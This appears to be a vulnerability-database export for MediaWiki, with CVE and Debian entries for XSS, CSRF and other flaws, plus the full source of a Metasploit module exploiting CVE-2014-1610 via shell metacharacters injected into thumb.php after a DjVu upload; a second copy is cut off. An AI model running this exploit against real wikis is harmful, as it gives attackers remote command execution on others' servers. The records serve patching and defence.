"cpe:2.3:a:mediawiki:mediawiki:1.5:beta4:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:09", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via a -o-link attribute.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "cve", "title": "CVE-2013-6454", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6454"], "modified": "2014-05-13T14:21:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.7"], "id": "CVE-2013-6454", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6454", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2022-07-06T06:01:58", "description": "Cross-site scripting (XSS) vulnerability in mediawiki.page.image.pagination.js in MediaWiki 1.22.x before 1.22.9 and 1.23.x before 1.23.2 allows remote attackers to inject arbitrary web script or HTML via vectors involving the multipageimagenavbox class in conjunction with an action=raw value.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "debiancve", "title": "CVE-2014-5242", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5242"], "modified": "2014-08-22T17:55:00", "id": "DEBIANCVE:CVE-2014-5242", "href": "https://security-tracker.debian.org/tracker/CVE-2014-5242", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "The JSONP endpoint in includes/api/ApiFormatJson.php in MediaWiki before 1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x before 1.23.2 accepts certain long callback values and does not restrict the initial bytes of a JSONP response, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks, and obtain sensitive information, via a crafted OBJECT element with SWF content consistent with a restricted character set.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "debiancve", "title": "CVE-2014-5241", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241"], "modified": "2014-08-22T17:55:00", "id": "DEBIANCVE:CVE-2014-5241", "href": "https://security-tracker.debian.org/tracker/CVE-2014-5241", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T06:01:58", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 does not properly sanitize SVG files, which allows remote attackers to have unspecified impact via invalid XML.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "debiancve", "title": "CVE-2013-6453", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6453"], "modified": "2014-05-12T14:55:00", "id": "DEBIANCVE:CVE-2013-6453", "href": "https://security-tracker.debian.org/tracker/CVE-2013-6453", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T06:01:58", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via crafted XSL in an SVG file.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "debiancve", "title": "CVE-2013-6452", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6452"], "modified": "2014-05-12T14:55:00", "id": "DEBIANCVE:CVE-2013-6452", "href": "https://security-tracker.debian.org/tracker/CVE-2013-6452", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to obtain information about deleted page via the (1) log API, (2) enhanced RecentChanges, and (3) user watchlists.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "debiancve", "title": "CVE-2013-6472", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6472"], "modified": "2014-05-12T14:55:00", "id": "DEBIANCVE:CVE-2013-6472", "href": "https://security-tracker.debian.org/tracker/CVE-2013-6472", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "MediaWiki before 1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x before 1.23.2 does not enforce an IFRAME protection mechanism for transcluded pages, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "debiancve", "title": "CVE-2014-5243", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5243"], "modified": "2014-08-22T17:55:00", "id": "DEBIANCVE:CVE-2014-5243", "href": "https://security-tracker.debian.org/tracker/CVE-2014-5243", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki 1.19.9 before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via unspecified CSS values.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-01-28T15:15:00", "type": "debiancve", "title": "CVE-2013-6451", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451"], "modified": "2020-01-28T15:15:00", "id": "DEBIANCVE:CVE-2013-6451", "href": "https://security-tracker.debian.org/tracker/CVE-2013-6451", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the page parameter to includes/media/DjVu.php; (2) the w parameter (aka width field) to thumb.php, which is not properly handled by includes/media/PdfHandler_body.php; and possibly unspecified vectors in (3) includes/media/Bitmap.php and (4) includes/media/ImageHandler.php.", "cvss3": {}, "published": "2014-01-30T23:55:00", "type": "debiancve", "title": "CVE-2014-1610", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2014-01-30T23:55:00", "id": "DEBIANCVE:CVE-2014-1610", "href": "https://security-tracker.debian.org/tracker/CVE-2014-1610", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T06:01:58", "description": "Cross-site scripting (XSS) vulnerability in includes/actions/InfoAction.php in MediaWiki before 1.21.9 and 1.22.x before 1.22.6 allows remote attackers to inject arbitrary web script or HTML via the sort key in an info action.", "cvss3": {}, "published": "2014-04-29T18:55:00", "type": "debiancve", "title": "CVE-2014-2853", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2853"], "modified": "2014-04-29T18:55:00", "id": "DEBIANCVE:CVE-2014-2853", "href": "https://security-tracker.debian.org/tracker/CVE-2014-2853", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via a -o-link attribute.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "debiancve", "title": "CVE-2013-6454", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6454"], "modified": "2014-05-12T14:55:00", "id": "DEBIANCVE:CVE-2013-6454", "href": "https://security-tracker.debian.org/tracker/CVE-2013-6454", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-08-02T18:25:39", "description": "A remote code execution vulnerability has been reported in MediaWiki. The vulnerability is due to improper validation of user data. A remote attacker can exploit this vulnerability by sending a specially crafted HTTP request to the target.", "cvss3": {}, "published": "2014-01-26T00:00:00", "type": "checkpoint_advisories", "title": "MediaWiki Input Validation Remote Code Execution (CVE-2014-1610)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2015-06-10T00:00:00", "id": "CPAI-2014-0764", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T09:48:52", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote unauthenticated users to execute arbitrary commands via shell metacharacters. If no target file is specified this module will attempt to log in with the provided credentials to upload a file (.DjVu) to use for exploitation.\n", "cvss3": {}, "published": "2014-02-07T20:37:44", "type": "metasploit", "title": "MediaWiki Thumb.php Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2022-03-21T12:47:39", "id": "MSF:EXPLOIT-MULTI-HTTP-MEDIAWIKI_THUMB-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/mediawiki_thumb/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\n 'Description' => %q{\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\n users to execute arbitrary commands via shell metacharacters. If no target file\n is specified this module will attempt to log in with the provided credentials to\n upload a file (.DjVu) to use for exploitation.\n },\n 'Author' =>\n [\n 'Netanel Rubin', # from Check Point - Discovery\n 'Brandon Perry', # Metasploit Module\n 'Ben Harris', # Metasploit Module\n 'Ben Campbell' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-1610' ],\n [ 'OSVDB', '102630'],\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\n ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Automatic PHP-CLI',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\\r\\n\",\n 'PrependEncoder' => \"php -r \\\"\",\n 'AppendEncoder' => \"\\\"\"\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP\n }\n ],\n [ 'Linux CMD',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl python php',\n }\n },\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD\n }\n ],\n [ 'Windows CMD',\n {\n 'Payload' =>\n {\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl',\n }\n },\n 'Platform' => ['win'],\n 'Arch' => ARCH_CMD\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2014-01-28'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]),\n OptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]),\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]),\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ])\n ])\n end\n\n def get_version(body)\n meta_generator = get_html_value(body, 'meta', 'generator', 'content')\n\n unless meta_generator\n vprint_status(\"No META Generator tag on #{full_uri}.\")\n return nil, nil, nil\n end\n\n if meta_generator && meta_generator =~ /mediawiki/i\n vprint_status(\"#{meta_generator} detected.\")\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\n major = $1.to_i\n minor = $2.to_i\n patch = $3.to_i\n vprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\")\n\n return major, minor, patch\n end\n\n return nil, nil, nil\n end\n\n def check\n uri = target_uri.path\n\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\n\n response = send_request_cgi!(opts)\n\n if opts['redirect_uri']\n vprint_status(\"Redirected to #{opts['redirect_uri']}.\")\n end\n\n unless response\n vprint_status(\"No response from #{full_uri}.\")\n return CheckCode::Unknown\n end\n\n # Mediawiki will give a 404 for unknown pages but still have a body\n if response.code == 200 || response.code == 404\n vprint_status(\"#{response.code} response received...\")\n\n major, minor, patch = get_version(response.body)\n\n unless major\n return CheckCode::Unknown\n end\n\n if major == 1 && (minor < 8 || minor > 22)\n return CheckCode::Safe\n elsif major == 1 && (minor == 22 && patch > 1)\n return CheckCode::Safe\n elsif major == 1 && (minor == 21 && patch > 4)\n return CheckCode::Safe\n elsif major == 1 && (minor == 19 && patch > 10)\n return CheckCode::Safe\n elsif major == 1\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n vprint_status(\"Received response code #{response.code} from #{full_uri}\")\n CheckCode::Unknown\n end\n\n def exploit\n uri = target_uri.path\n\n print_status(\"Grabbing version and login CSRF token...\")\n response = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'vars_get' => { 'title' => 'Special:UserLogin' }\n })\n\n unless response\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\n end\n\n server = response['Server']\n if server && target.name =~ /automatic/i && server =~ /win32/i\n vprint_status(\"Windows platform detected: #{server}.\")\n my_platform = Msf::Module::Platform::Windows\n elsif server && target.name =~ /automatic/i\n vprint_status(\"Nix platform detected: #{server}.\")\n my_platform = Msf::Module::Platform::Unix\n else\n my_platform = target.platform.platforms.first\n end\n\n # If we have already identified a DjVu/PDF file on the server trigger\n # the exploit\n unless datastore['FILENAME'].blank?\n payload_request(uri, datastore['FILENAME'], my_platform)\n return\n end\n\n username = datastore['USERNAME']\n password = datastore['PASSWORD']\n\n major, minor, patch = get_version(response.body)\n\n # Upload CSRF added in v1.18.2\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\n upload_csrf = false\n elsif ((major == 1) && (minor < 18))\n upload_csrf = false\n else\n upload_csrf = true\n end\n\n session_cookie = response.get_cookies\n\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\n\n if wp_login_token.blank?\n fail_with(Failure::UnexpectedReply, \"Couldn't find login token. Is URI set correctly?\")\n else\n print_good(\"Retrieved login CSRF token.\")\n end\n\n print_status(\"Attempting to login...\")\n login = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'method' => 'POST',\n 'vars_get' => {\n 'title' => 'Special:UserLogin',\n 'action' => 'submitlogin',\n 'type' => 'login'\n },\n 'cookie' => session_cookie,\n 'vars_post' => {\n 'wpName' => username,\n 'wpPassword' => password,\n 'wpLoginAttempt' => 'Log in',\n 'wpLoginToken' => wp_login_token\n }\n })\n\n if login and login.code == 302\n print_good(\"Log in successful.\")\n else\n fail_with(Failure::NoAccess, \"Failed to log in.\")\n end\n\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\n\n # Testing v1.15.1 it looks like it has session fixation\n # vulnerability so we dont get a new session cookie after\n # authenticating. Therefore we need to include our old cookie.\n unless auth_cookie.include? 'session='\n auth_cookie << session_cookie\n end\n\n print_status(\"Getting upload CSRF token...\") if upload_csrf\n upload_file = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\n 'cookie' => auth_cookie\n })\n\n unless upload_file and upload_file.code == 200\n fail_with(Failure::NotFound, \"Failed to access file upload page.\")\n end\n\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\n\n if upload_csrf && wp_edit_token.blank?\n fail_with(Failure::UnexpectedReply, \"Couldn't find upload token. Is URI set correctly?\")\n elsif upload_csrf\n print_good(\"Retrieved upload CSRF token.\")\n end\n\n upload_mime = Rex::MIME::Message.new\n\n djvu_file = ::File.binread(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\"))\n file_name = \"#{rand_text_alpha(4)}.djvu\"\n\n upload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\")\n upload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\")\n upload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\")\n upload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\")\n upload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\")\n upload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf\n upload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\")\n upload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\")\n upload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\")\n post_data = upload_mime.to_s\n\n print_status(\"Uploading DjVu file #{file_name}...\")\n\n upload = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\n 'data' => post_data,\n 'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\",\n 'cookie' => auth_cookie\n })\n\n if upload and upload.code == 302 and upload.headers['Location']\n location = upload.headers['Location']\n print_good(\"File uploaded to #{location}\")\n else\n if upload.body.include? 'not a permitted file type'\n fail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\")\n else\n fail_with(Failure::UnexpectedReply, \"Failed to upload file.\")\n end\n end\n\n payload_request(uri, file_name, my_platform)\n end\n\n def payload_request(uri, file_name, my_platform)\n if my_platform == Msf::Module::Platform::Windows\n trigger = \"1)&(#{payload.encoded})&\"\n else\n trigger = \"1;#{payload.encoded};\"\n end\n\n vars_get = { 'f' => file_name }\n if file_name.include? '.pdf'\n vars_get['width'] = trigger\n elsif file_name.include? '.djvu'\n vars_get['width'] = 1\n vars_get['p'] = trigger\n else\n fail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\")\n end\n\n print_status(\"Sending payload request...\")\n r = send_request_cgi({\n 'uri' => normalize_uri(uri, 'thumb.php'),\n 'vars_get' => vars_get\n }, 1)\n\n if r && r.code == 404 && r.body =~ /not exist/\n print_error(\"File: #{file_name} does not exist.\")\n elsif r\n print_error(\"Received response #{r.code}, exploit probably failed\")\n end\n end\n\n # The order of name, value keeps shifting so regex is painful.\n # Cant use nokogiri due to security issues\n # Cant use REXML directly as its not strict XHTML\n # So we do a filthy mixture of regex and REXML\n def get_html_value(html, type, name, value)\n return nil unless html\n return nil unless type\n return nil unless name\n return nil unless value\n\n found = nil\n html.each_line do |line|\n if line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i\n found = $&\n break\n end\n end\n\n if found\n doc = REXML::Document.new found\n return doc.root.attributes[value]\n end\n\n ''\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/mediawiki_thumb.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:12", "description": "", "cvss3": {}, "published": "2014-02-19T00:00:00", "type": "packetstorm", "title": "MediaWiki Thumb.php Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-19T00:00:00", "id": "PACKETSTORM:125287", "href": "https://packetstormsecurity.com/files/125287/MediaWiki-Thumb.php-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MediaWiki Thumb.php Remote Command Execution', \n'Description' => %q{ \nMediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, \nwhen DjVu or PDF file upload support is enabled, allows remote unauthenticated \nusers to execute arbitrary commands via shell metacharacters. If no target file \nis specified this module will attempt to log in with the provided credentials to \nupload a file (.DjVu) to use for exploitation. \n}, \n'Author' => \n[ \n'Netanel Rubin', # from Check Point - Discovery \n'Brandon Perry', # Metasploit Module \n'Ben Harris', # Metasploit Module \n'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-1610' ], \n[ 'OSVDB', '102630'], \n[ 'URL', 